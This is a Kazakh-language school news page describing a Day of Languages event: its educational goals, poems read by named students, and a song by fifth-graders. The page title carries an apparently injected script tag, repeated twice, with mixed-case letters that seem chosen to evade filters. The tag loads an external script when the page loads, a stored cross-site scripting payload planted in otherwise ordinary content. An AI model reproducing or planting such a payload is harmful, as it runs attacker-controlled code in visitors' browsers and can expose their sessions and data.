Қазақстан халықтарының тілдері күні.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

05.09.2023

   Бүгін мектебімізде Қазақстан халықтарының тілдері күні мерекесіне арналған «Тіл – әр ұлттың ең асыл қазынасы!» атты салтанатты іс-шара және «Қазақстан халықтарының тілдері күні» сынып сағаттары өтті. Іс-шаралардың мақсаттары:
 Қазақстан территориясын мекендейтін халықтардың салт-дәстүрлеріне, әдет-ғұрыптарына және тілдеріне құрметпен қарауға тәрбиелеу; әр түрлі халықтардың тілдерін білуге, оқуға деген құштарлықты тәрбиелеу. Іс-шараларда тіл туралы слайдтар мен бейнероликтер көрсетілді. Шараға қатысушылар әр ұлт үшін ана тілі – ең аяулы, ең құдіретті, ең әуезді тіл екенін айтты. Осы ойды қуаттай отырып, мектебіміздің оқушылары Гердт Полина, Сахно Анастасия, Кукурузина Аделя, Искаков Максим тілдер туралы өлеңдер оқыды. 5 сынып оқушылары «Достық әні» әнін орындады. Сынып жетекшілері қай тілде сөйлесек те, Қазақстан біздің ортақ үйіміз екенін атап өтті.  1-10 сыныптардың сынып жетекшілері

Просмотров: 437


Пікір қосу



Деректерді қолтаңбаға қосу